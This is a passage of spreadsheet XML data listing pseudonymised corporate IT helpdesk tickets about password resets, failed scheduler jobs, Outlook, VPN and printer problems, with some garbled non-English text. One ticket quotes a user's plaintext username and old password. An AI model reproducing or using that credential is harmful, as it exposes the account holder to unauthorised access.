    <s v="job Job_1330 failed in job_scheduler at: 10/25/2016 00:12:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1330 failed in job_scheduler at: 10/25/2016 00:12:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="zeitdaten fÃ¼r germany steel fehlen"/>
    <s v="seit gestern ca. 15.00 uhr fehlen alle zeitdaten. daten werden dringend fÃ¼r die tÃ¤glichen auswertungen (leistungsgrad u.s.w.) benÃ¶tigt"/>
    <s v="yjofqlrx aqvxfhmn"/>
    <x v="32"/>
  </r>
  <r>
    <s v="network outage:poncacity -germany-dmvpn router is down since 11:23 am et on 10/24."/>
    <s v="what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____________11:23 am et on 10/24._________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___no____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ___na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___yes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x v="7"/>
  </r>
  <r>
    <s v=":i am unable to open the collaboration_platform link shared by my europe counterpart."/>
    <s v="name:theajdlkadyt hrtgsd_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lqipwdeg.dkbmjnvl@gmail.com_x000a_customer number:_x000a__x000a_summary:i am unable to open the collaboration_platform link shared by my europe counterpart._x000a_\\eagl8111432\users\schetrhsdlw\collaboration_platform - company inc-\k12526634"/>
    <s v="lqipwdeg dkbmjnvl"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" can not reach to password_management_tool password manager to change my password"/>
    <s v="name:mitgckqf ewourgcx_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:mitgckqf.ewourgcx@gmail.com_x000a_customer number:_x000a_summary:i can not reach to password_management_tool password manager to change my password"/>
    <s v="mitgckqf ewourgcx"/>
    <x v="0"/>
  </r>
  <r>
    <s v=": k-bngell-cgdaytshqsd &lt;k-bngell-cgdaytshqsd@company.onmicrosoft.com&gt;"/>
    <s v="_x000a__x000a_received from: lvxakohq.tsfnhowj@gmail.com_x000a__x000a_hello ,_x000a__x000a_pl add my name in to this team._x000a__x000a_also i need administrative control of this since i have heading this team after ndthwedwys rao left company._x000a__x000a__x000a__x000a_with kind "/>
    <s v="lvxakohq tsfnhowj"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job SID_39filesys failed in job_scheduler at: 10/24/2016 21:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_39filesys failed in job_scheduler at: 10/24/2016 21:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="msd - office 2013 outlook æ‰“ä¸å¼€ï¼Œæ˜¾ç¤ºæ— æ³•åˆ›å»ºæ–°çš„å †æ ˆé˜²æŠ¤é¡µé¢"/>
    <s v="please provide details of the issue._x000a_[â€Ž2016/â€Ž10/â€Ž25 9:36] melhduty gqchtedl: _x000a_hi _x000a_æˆ‘çš„ç”µè„‘é‚®ç®±æ‰“ä¸å¼€äº†_x000a_ä½ å¯ä»¥å¸®æˆ‘å—ï¼Ÿ_x000a_è°¢è°¢_x000a_[â€Ž2016/â€Ž10/â€Ž25 9:38] melhduty gqchtedl: _x000a_æ˜¾ç¤ºç³»ç»Ÿé”™è¯¯_x000a_æ˜¾ç¤ºæ— æ³•åˆ›å»ºæ–°çš„å †æ ˆé˜²æŠ¤é¡µé¢_x000a_[â€Ž2016/â€Ž10/â€Ž25 9:40] obuwfnkm ufpwmybi: _x000a_æŠŠä½ æ¡Œé¢å…±äº«ç»™æˆ‘_x000a_[â€Ž2016/â€Ž10/â€Ž25 9:41] melhduty gqchtedl: _x000a_id _x000a_"/>
    <s v="melhduty gqchtedl"/>
    <x v="31"/>
  </r>
  <r>
    <s v="çœ‹ä¸è§a3 çš„æ–‡ä»¶å¤¹ï¼ˆ\\HostName_17\teams\business\ a3 ï¼‰ï¼Œè¯·å¸®å¿™å¼„ä¸€ä¸‹ã€‚sahtym wanthryg "/>
    <s v="çœ‹ä¸è§a3 çš„æ–‡ä»¶å¤¹ï¼ˆ\\HostName_17\teams\business\ a3 ï¼‰ï¼Œè¯·å¸®å¿™å¼„ä¸€ä¸‹ã€‚sahtym wanthryg "/>
    <s v="hlrmufzx qcdzierm"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_568 failed in job_scheduler at: 10/24/2016 20:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_568 failed in job_scheduler at: 10/24/2016 20:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>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liksfpeq pwjbsryc"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" october cyber security month - ransomware"/>
    <s v=" october cyber security month - ransomware"/>
    <s v="pyrtfdxu nxfkqmoy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ms outlook  stopped updating (cant receive or send e-mails since fr.10/21/16) "/>
    <s v="please check lfal8512946.  looks like bothms office 2010&amp; 2016 installed? ii have an access database that won't work with 2016. 7:30am-4pm pacific 775-432-6109"/>
    <s v="ugrnzjpy utbswegc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on inplant_872730"/>
    <s v="ticket update on inplant_872730"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="logon balancing error on erp SID_34"/>
    <s v="logon balancing error on erp SID_34_x000a__x000a_user brandtrhee pjdhfitman called on behalf of user"/>
    <s v="xtqbjieu uablitwr"/>
    <x v="19"/>
  </r>
  <r>
    <s v="job Job_738 failed in job_scheduler at: 10/24/2016 17:32:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_738 failed in job_scheduler at: 10/24/2016 17:32:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows account locked"/>
    <s v="windows account locked"/>
    <s v="wetajgsq ezmcqkbp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="backup on company provided mobile phone"/>
    <s v="backup on company provided mobile phone"/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="purchasingupstreamsso and ad for qpixeudn rjlziysd"/>
    <s v="please create an purchasingupstreamsso and ad for qpixeudn rjlziysd (bachsdadgtadw).  the samaccountname in ad is to be all lowercase. "/>
    <s v="xszoedmc gmhkdsnw"/>
    <x v="19"/>
  </r>
  <r>
    <s v="badges for msc training"/>
    <s v="_x000a__x000a_received from: gdkiehbr.kdithjsr@gmail.com_x000a__x000a_please activate the badge numbers below for the msc training._x000a_they need to be active from monday october 31st at 7:00 am cst to thursday november 3rd at 5:00 pm cst_x000a_54654657_x000a_54651789_x000a_54653756_x000a__x000a_"/>
    <s v="gdkiehbr kdithjsr"/>
    <x v="2"/>
  </r>
  <r>
    <s v="cannot get into crm"/>
    <s v="missing the sales &amp; markhtyeting tab from the enterprise portal which gives access to crm, so i don't have access to crm"/>
    <s v="gtfdvnry nxsaqrfh"/>
    <x v="19"/>
  </r>
  <r>
    <s v="please provide access"/>
    <s v="_x000a__x000a_received from: tbvpkjoh.wnxzhqoa@gmail.com_x000a__x000a_i need access to the following path.  please see pmgzjikq potmrkxy for approval._x000a__x000a__x000a__x000a_tbvpkjoh wnxzhqoa_x000a_company usa plant controller_x000a_tbvpkjoh.wnxzhqoa@gmail.com&lt;mailto:tbvpkjoh.wnxzhqoa@gmail.com&gt;_x000a_"/>
    <s v="tbvpkjoh wnxzhqoa"/>
    <x v="15"/>
  </r>
  <r>
    <s v="ticket update on inplant_872683"/>
    <s v="ticket update on inplant_872683"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to collaboration_platform // password reset"/>
    <s v="unable to login to collaboration_platform // password reset"/>
    <s v="rvqnjgas kcmybldh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="all my calls to my ip phone are going to warehouse_toolmail, it is not even ringing. "/>
    <s v="all my calls to my ip phone are going to warehouse_toolmail, it is not even ringing. "/>
    <s v="damuphws arkulcoi"/>
    <x v="2"/>
  </r>
  <r>
    <s v="sales area selection on opportunities not filtering to those in which the account is extended. instead it shows all. "/>
    <s v="sales area selection on opportunities not filtering to those in which the account is extended. see attached email communication including example for account # 81877788768."/>
    <s v="msarjyhi fpxdbeno"/>
    <x v="39"/>
  </r>
  <r>
    <s v="pc not detecting docking station"/>
    <s v="pc not detecting docking station"/>
    <s v="dglwxfzu sgbnpvql"/>
    <x v="2"/>
  </r>
  <r>
    <s v="having trouble connecting to companysecure"/>
    <s v="jeftryhf is having trouble connecting to companysecure at remote sites and usa. "/>
    <s v="hdetqcpj ehsjitcy"/>
    <x v="2"/>
  </r>
  <r>
    <s v="i cannot log into erp. "/>
    <s v=" i tried rebooting the computer and i tried logging into another computer and i get a blank screen."/>
    <s v="trxpwfag fakubynv"/>
    <x v="40"/>
  </r>
  <r>
    <s v="request to reset microsoft online services password for szrglyte.stvyhzxn@gmail.com"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: monday, october 24, 2016 6:07 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: _x000a_subject: shadakjsdd request to reset microsoft online services password for szrglyte.stvyhzxn@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ szrglyte.stvyhzxn@gmail.com _x000a_â€¢ first name: twejhda _x000a_â€¢ last name: asjadjs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szrglyte stvyhzxn"/>
    <x v="0"/>
  </r>
  <r>
    <s v="usa file server, HostName_1326, has failed hard drive"/>
    <s v="usa file server, HostName_1326, has failed hard drive"/>
    <s v="xweclugf qmhbjsyi"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to display the expense report"/>
    <s v="unable to display the expense report"/>
    <s v="sghamujc shompueb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call //gso"/>
    <s v="blank call //gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unlock account the user aeftjxos lhnyofad - id: vvsardkajdjtf"/>
    <s v="hi team,_x000a_could you please unlock account the user aeftjxos lhnyofad - id: vvsardkajdjtf. case this account was expired, please extend the access for the account, the manager this user is zuyimtsf qjtimdsp - please contact majsdtnrio._x000a__x000a_or, if you have more doubts please return me .._x000a_"/>
    <s v="qasdhyzm yuglsrwx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to login to outlook"/>
    <s v="from: rjsulvat uanigkqc _x000a_sent: monday, october 24, 2016 7:36 pm_x000a_to: nwfodmhc exurcwkm_x000a_subject: thadasgg fwd: problem with outlook_x000a__x000a_it is again_x000a__x000a_ _x000a_ _x000a_Ð¾Ñ‚Ð¿Ñ€Ð°Ð²Ð»ÐµÐ½Ð¾ Ñ iphone_x000a__x000a_Ð½Ð°Ñ‡Ð°Ð»Ð¾ Ð¿ÐµÑ€ÐµÐ°Ð´Ñ€ÐµÑÐ¾Ð²Ð°Ð½Ð½Ð¾Ð³Ð¾ ÑÐ¾Ð¾Ð±Ñ‰ÐµÐ½Ð¸Ñ:_x000a_Ð¾Ñ‚: &quot;rjsulvat uanigkqc&quot; &lt;rjsulvat.uanigkqc@gmail.com&gt;_x000a_ÐºÐ¾Ð¼Ñƒ: &quot;nwfodmhc exurcwkm&quot; &lt;nwfodmhc.exurcwkm@gmail.com&gt;_x000a_Ñ‚ÐµÐ¼Ð°: problem with outlook_x000a_hello._x000a__x000a_i cannot start outlook_x000a_ _x000a__x000a_ _x000a__x000a_Ð¾Ñ‚Ð¿Ñ€Ð°Ð²Ð»ÐµÐ½Ð¾ Ñ iphone_x000a__x000a__x000a_"/>
    <s v="rjsulvat uanigkqc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="logon balancing error in erp"/>
    <s v="logon balancing error in erp"/>
    <s v="ywlbctfr yvkhcwip"/>
    <x v="19"/>
  </r>
  <r>
    <s v="outlook freezing issue"/>
    <s v="outlook freezing issue"/>
    <s v="kailyenh zfyvkopr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the username ccghksdm787 will be used to login to company via citrix"/>
    <s v="hello,_x000a__x000a_the username ccghksdm787 will be used to login to company via citrix_x000a__x000a_i assume that we need to delete this user profile on the citrix servers so please send a ticket to the citrix team because his account in active directory is not locked_x000a__x000a__x000a_oinqckds qieswrfu_x000a_manager _x000a_oinqckds.qieswrfu@gmail.com_x000a_gesendet: dienstag, 18. oktober 2016 16:40_x000a_an: oinqckds qieswrfu_x000a_betreff: password_x000a__x000a_hi ,_x000a__x000a_can you please reset my  account so i can login again._x000a_my user is : ccghksdm787_x000a_my last password was: pr03bsddqd99_x000a_it doesnt work so i cant login at the moment._x000a__x000a_"/>
    <s v="oinqckds qieswrfu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="prtgghj4k access locked"/>
    <s v="jgdydqqd locked me out.  i tried going onto password_management_tool to reset my password but jgdydqqd isn't listed.  can you please unlock my account aerp?  "/>
    <s v="horeduca ogrhivnm"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to connect to the home internet"/>
    <s v="internet connection does not appear to be working - wireless"/>
    <s v="ctepaurs igrazhwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to sign in reporting_tool"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vmeljsfb.ymxejsbd@gmail.com_x000d__x000a__x000d__x000a_hello, i am unable to sign into reporting_tool. can someone please assist me with my correct user name and password? i have never signed into it before._x000d__x000a_"/>
    <s v="vmeljsfb ymxejsbd"/>
    <x v="19"/>
  </r>
  <r>
    <s v="vitalyst transfer:  crm calendar not showing on outlook"/>
    <s v="vitalyst transfer:  crm calendar not showing on outlook"/>
    <s v="eqxakzyi cwfrjitq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access erp through my vpn connection"/>
    <s v="working from home, started vpn, cannot access erp.  keep getting logon balancing error 88.  suggest submitting to it team at usa."/>
    <s v="ywlbctfr yvkhcwip"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device activation."/>
    <s v="hello colleagues,_x000a__x000a_would you please be so kind and activate the new iphone of hybegvwo dbgrtqhs (company\kstdaddaad )_x000a__x000a_details, please see mail below._x000a__x000a_many "/>
    <s v="hybegvwo dbgrtqhs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="a kÃ¼ndigung for eluvxqhw gpbfkqeu, 11166428, effective 28.02.2017 has been approved. "/>
    <s v="hello , _x000d__x000a__x000d__x000a_a kÃ¼ndigung for eluvxqhw gpbfkqeu, 11166428, effective 28.02.2017 has been approved. _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="trgqbeax hfyzudql"/>
    <x v="19"/>
  </r>
  <r>
    <s v="password reset."/>
    <s v="from: nwfodmhc exurcwkm _x000a_sent: monday, october 24, 2016 9:49 pm_x000a_to: uzpycdho hdswinlo; ustvaifg hmzfewks_x000a_subject: uzpycdho hdswinlo, your windows password is expiring soon!!_x000a__x000a_hi ,_x000a__x000a_unfortunately it is an automatic process. we cannot extend the time period. _x000a_once you come back from vacation please give us a call back. we will reset the password for you._x000a__x000a__x000a__x000a_"/>
    <s v="uzpycdho hdswinlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="phksfqxe wkbovsmu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
    <s v="krynlisw dqfeglkc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp "/>
    <s v="name:fievgddtrr_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:hpelnwco.byjgvdzf@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary: erp bloqued_x000a_too many failes attempts._x000a_tanks"/>
    <s v="hpelnwco byjgvdzf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype online meeting freezing"/>
    <s v="unable to join a skype meeting._x000d__x000a_skype keeps freezing."/>
    <s v="smhepfdn aypgzieh"/>
    <x v="27"/>
  </r>
  <r>
    <s v="unable to connect to company center // sales org not working"/>
    <s v="unable to connect to company center // sales org not working"/>
    <s v="ctepaurs igrazhwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call"/>
    <s v="blank call"/>
    <s v="ayrhcfxi zartupsw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to global_telecom_1 broadband"/>
    <s v="name:joetrhud_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:eziswfym.cehwzojy@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:unable to connect to internet using  broadband service."/>
    <s v="eziswfym cehwzojy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="password has expired"/>
    <s v="garthyhtuy was out of office for a long time, and needs assistance with logging back in to the pc now._x000a_he is in office at the moment."/>
    <s v="bqrwfkun tsdzmplq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="summary:attendance_tool password forgot."/>
    <s v="name:kirathrydan_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jchlkard.tcaiyjfg@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:attendance_tool password forgot"/>
    <s v="aorthyme rnsuipbk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp zqt pntp and zntc price not calculating on quote 2005151099"/>
    <s v="erp quote pntp net price and zntc unit price are $0.00 but all costs are loaded. see screenshots in email attached. need quote to send to customer for ordering_x000a_"/>
    <s v="zsulhnxd gexdzoqy"/>
    <x v="12"/>
  </r>
  <r>
    <s v="could not use bobjee application: search and explorer analytics / erp netweaver portal"/>
    <s v="error message: it was not possible to retrieve the facets and their values._x000d__x000a_can't start exploring the information space as it doesn't contain any data."/>
    <s v="gaiopkun bvcdpxrt"/>
    <x v="8"/>
  </r>
  <r>
    <s v="us time change"/>
    <s v="_x000a__x000a_received from: xabkyoug.wdkyiqfx@gmail.com_x000a__x000a_hi team,_x000a__x000a_below is the hub posting to be published for us time change aerp. revert if you have any questions._x000a__x000a_planned service disruption_x000a__x000a__x000a__x000a_what is the event? (daylight savings time ends in u.s.)_x000a__x000a__x000a__x000a__x000a__x000a__x000a_when does it begin? (6:00 pm edt saturday, 5th-november-2016)_x000a__x000a__x000a__x000a__x000a__x000a__x000a_when does it end?  (following time change, 2:00 am est sunday, 06-november-2016)_x000a__x000a__x000a__x000a__x000a__x000a__x000a_who and what will be affected? (all erp users, all erp systems including erp, plm, bw, crm, supply_chain, hcm)_x000a__x000a__x000a_what is the reason?  (all erp systems must be stopped during time change to prevent data inconsistency.)_x000a__x000a__x000a_questions?_x000a__x000a_(corporate datacenter â€“)_x000a__x000a__x000a_(xabkyoug wdkyiqfx, nvyjtmca xjhpznds &amp; network operations)_x000a__x000a__x000a__x000a__x000a_best "/>
    <s v="xabkyoug wdkyiqfx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1020-idb-daily failed in job_scheduler at: 10/24/2016 10:13:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1020-idb-daily failed in job_scheduler at: 10/24/2016 10:13:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="2 in 1 has cracked screen, but turned off touch screen. so no longer jumps curser around."/>
    <s v="2 in 1 has cracked screen, but turned off touch screen. so no longer jumps curser around._x000a__x000a_phone:_x000a_pc name: lmsl8300803trys"/>
    <s v="jkelxorm uwqjlzfm"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset for uacyltoe hxgayczemii8"/>
    <s v="name:dctvfjrn oypnxftq_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:dctvfjrn.oypnxftq@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:reset the password for aolhgbps pbxqtcek uacyltoe hxgayczemii8"/>
    <s v="dctvfjrn oypnxftq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype "/>
    <s v="unable to login to skype "/>
    <s v="ctepaurs igrazhwo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop issues"/>
    <s v="_x000a__x000a_received from: lwizucan.zvnxlobq@gmail.com_x000a__x000a_hallo,_x000a__x000a_my outlook collapsed two times. i tried to restart my laptop, but it doesn't startup anymore.  restarting is on my screen for already half an hour._x000a_[image1.jpg]_x000a_met vriendelijke groet,_x000a__x000a_lwizucan zvnxlobq_x000a_directeur company _x000a_lwizucan.zvnxlobq@gmail.com&lt;mailto:lwizucan.zvnxlobq@gmail.com&gt;_x000a__x000a_"/>
    <s v="lwizucan zvnxlobq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="receiving collaboration_platform deletion emails in not in english"/>
    <s v="_x000a__x000a_received from: gvxfymjk.euioadyf@gmail.com_x000a__x000a_why are these coming in spanish?_x000a_i have already told lothryra what they mean, but they should be in english._x000a_please enter a ticket for collaboration._x000a__x000a_"/>
    <s v="gvxfymjk euioadyf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="unable to open outlook"/>
    <s v="unable to open outlook"/>
    <s v="jmxrabzy dpyvjcxr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ip address conflict "/>
    <s v="carthygyrol is back in the office after few weeks off, she saw an ip address conflict message._x000a_requested to restart and she did not see the message again."/>
    <s v="xtqbjieu uablitwr"/>
    <x v="0"/>
  </r>
  <r>
    <s v="scan doesn't work in the home printer"/>
    <s v="scan doesn't work in the home printer"/>
    <s v="lukibasy bqufyozk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account lock out."/>
    <s v="erp SID_34 account lock out._x000d__x000a_"/>
    <s v="rzglsoma qkjfwmnz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="skype meeting add-in getting disabled from outlook"/>
    <s v="skype meeting add-in getting disabled from outlook"/>
    <s v="lukibasy bqufyozk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="i canÂ´t connect my note book to the &quot; vpn &quot;"/>
    <s v="i canÂ´t connect my note book to the vpn &quot;  &quot;_x000d__x000a_page csn not be shown."/>
    <s v="hycqbvem oriablwt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="the password for &quot;infosthryda&quot; has expired. south amerirtca erp not working."/>
    <s v="today the erp is not working. while attempting to use the erp client, it shows a message (attached): &quot;37000: microsoft odbc vmsliazh ltksxmyv driver. login failed for user &quot;infosthryda&quot;. reason: the password of the account has expired&quot;._x000a_we have contacted the vendor that said the password is expired due to settings configured by company dba team. dba team should unlock account, cahnge password and setup the erp with the new password."/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="1"/>
  </r>
  <r>
    <s v="reset passwords for mgvpoyqd tnlshpwb using password_management_tool password reset."/>
    <s v="reset passwords for mgvpoyqd tnlshpwb using password_management_tool password reset."/>
    <s v="mgvpoyqd tnlshpwb"/>
    <x v="16"/>
  </r>
  <r>
    <s v="speaker not working in skype"/>
    <s v="_x000d__x000a__x000d__x000a_received from: weupycai.epqhduro@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am facing the issue of no sound during skype meeting. kindly do needful._x000d__x000a__x000d__x000a_best "/>
    <s v="weupycai epqhduro"/>
    <x v="0"/>
  </r>
  <r>
    <s v="problem of ticket_no1561937 which was fixed with chg1145039 has back"/>
    <s v="regarding ticket_no1561937 which was fixed with chg1145039, key user reported in the attached email that the application is showing the problem again today._x000d__x000a_we have contacted the vendor and they told us they will verify but have recommended to run the command again while they are investigating. also they have suggested us to involve the dba team to also verify. it seems the db is missing information._x000d__x000a_"/>
    <s v="kbnfxpsy gehxzayq"/>
    <x v="1"/>
  </r>
  <r>
    <s v="ts04562 printer isn't printing"/>
    <s v="name:gqhfieys pkwcdbrv_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:gqhfieys.pkwcdbrv@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:ts04562 printer still not working after system restart"/>
    <s v="gqhfieys pkwcdbrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="probleme mit fixiereinheit we101 \qvncizuf ueiybanz"/>
    <s v="probleme mit fixiereinheit we101 \qvncizuf ueiybanz"/>
    <s v="qvncizuf ueiybanz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="efrjkspc sfhbunrp, your windows password is expiring soon!!"/>
    <s v="from: efrjkspc sfhbunrp _x000a_sent: monday, october 24, 2016 11:54 am_x000a_to: nwfodmhc exurcwkm_x000a_subject:  - aw: efrjkspc sfhbunrp, your windows password is expiring soon!!_x000a_importance: high_x000a__x000a_hello._x000a__x000a_i have changed my password a few day days ago._x000a__x000a_why get i this reminder?_x000a__x000a_please inform me if i have change again?_x000a__x000a_"/>
    <s v="efrjkspc sfhbunrp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="aw: teams drive folder retention/deletion - please review and respond"/>
    <s v="_x000d__x000a__x000d__x000a_received from: oxkhntpl.xwszgidt@gmail.com_x000d__x000a__x000d__x000a_hello it support,_x000d__x000a__x000d__x000a_could you please give mr. vxpcnrtw xelhoicd the permission to read and write, load and upload files from the global teams drive for the folder gm-sge-programdnty?_x000d__x000a_many "/>
    <s v="oxkhntpl xwszgidt"/>
    <x v="33"/>
  </r>
  <r>
    <s v="usa ou deletion"/>
    <s v="all groups, qlhmawgi sgwipoxns and ou's for usatdhdal can be deleted.  usatdhdal ou can also be deleted"/>
    <s v="afkstcev utbnkyop"/>
    <x v="19"/>
  </r>
  <r>
    <s v="uacyltoe hxgaycze"/>
    <s v="name:tqnbkjgu xyedbsnm_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:tqnbkjgu.xyedbsnm@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:uacyltoe hxgaycze 2_x000a_"/>
    <s v="tqnbkjgu xyedbsnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" billing block not removed automatically"/>
    <s v="hello it,_x000d__x000a__x000d__x000a_please check, why billing block was not removed automatically._x000d__x000a__x000d__x000a_"/>
    <s v="jwqyxbzs adpvilqu"/>
    <x v="12"/>
  </r>
  <r>
    <s v="need to create the delivery note for sto 5019202486, but it wonÂ´t work"/>
    <s v="need to create the delivery note for sto 5019202486, but it wonÂ´t work"/>
    <s v="gokluswt qlvzreyb"/>
    <x v="5"/>
  </r>
  <r>
    <s v="erp SID_34 erp production password reset"/>
    <s v="name:chtrhysdrystal_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:oxkghdbr.dsyvalof@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:good morning. can you please reset my erp password?"/>
    <s v="oxkghdbr dsyvalof"/>
    <x v="0"/>
  </r>
  <r>
    <s v="need to install ts02345 printer"/>
    <s v="need to install ts02345 printer"/>
    <s v="gqhfieys pkwcdbrv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="urgent - users in germany are reporting that they cannot reach gso using the chat feature"/>
    <s v="tqnbkjgu xyedbsnm reported that he and his colleagues are unable to reach gso using the chat._x000d__x000a_when they fill out the form, the next page comes up only with the company logo._x000d__x000a_"/>
    <s v="fdmaluyo tvecikxn"/>
    <x v="21"/>
  </r>
  <r>
    <s v="new iphone activation /  die synchronisierung mit exchange activesync ist auf ihrem gerÃ¤t vorÃ¼bergehend blockiert, bis d"/>
    <s v="_x000a__x000a_received from: ecwtrjnq.jpecxuty@gmail.com_x000a__x000a_hello colleagues,_x000a__x000a_would you please be so kind and activate the new iphone of hybegvwo dbgrtqhs (company\sdjdskjdkyr )_x000a__x000a_details, please see mail below._x000a__x000a_many "/>
    <s v="ecwtrjnq jpecxuty"/>
    <x v="0"/>
  </r>
  <r>
    <s v="folder access : :\\HostName_753\departements\aese\thryad "/>
    <s v="folder access : :\\HostName_753\departements\aese\thryad _x000a__x000a_read &amp; write access needed"/>
    <s v="veyduami hjxpwqbi"/>
    <x v="0"/>
  </r>
  <r>
    <s v="in outlook and all other microsoft applications a message appears saying: product deactivated"/>
    <s v="in outlook and all other microsoft applications a message appears saying: product deactivated_x000d__x000a_"/>
    <s v="yxdbznju gicjlbrk"/>
    <x v="0"/>
  </r>
  <r>
    <s v="laptop bettery issue"/>
    <s v="facing charging issue._x000a__x000a_computer name : aidl89110765e6_x000a_service tag       : dcd1hz1hd._x000a__x000a_"/>
    <s v="zbmhdaru zhaupwno"/>
    <x v="18"/>
  </r>
  <r>
    <s v="reset passwords for bfnvjgxd trqmnpvu using password_management_tool password reset."/>
    <s v="reset passwords for bfnvjgxd trqmnpvu using password_management_tool password reset."/>
    <s v="bfnvjgxd trqmnpvu"/>
    <x v="16"/>
  </r>
  <r>
    <s v="druckerfunktionsstÃ¶rung"/>
    <s v="_x000d__x000a__x000d__x000a_received from: fdqjsygx.aivdjqtr@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_der drucker â€žem96&quot; scannt keine dokumente ein._x000d__x000a__x000d__x000a_fehlermeldung: zugriff Ã¼berprÃ¼fen fÃ¼r folgende ziele fehlgeschlagen:_x000d__x000a__x000d__x000a_                \\HostName_579\_kmscan\em96&lt;file:///\\HostName_579\_kmscan\em96&gt;: der pfad kann nicht gefunden werden._x000d__x000a__x000d__x000a_der fehler lÃ¤sst sich auch durch mehrmaliges ein- und ausschalten nicht beheben._x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="fdqjsygx aivdjqtr"/>
    <x v="41"/>
  </r>
  <r>
    <s v="erp SID_34 password reset."/>
    <s v="erp SID_34 password reset."/>
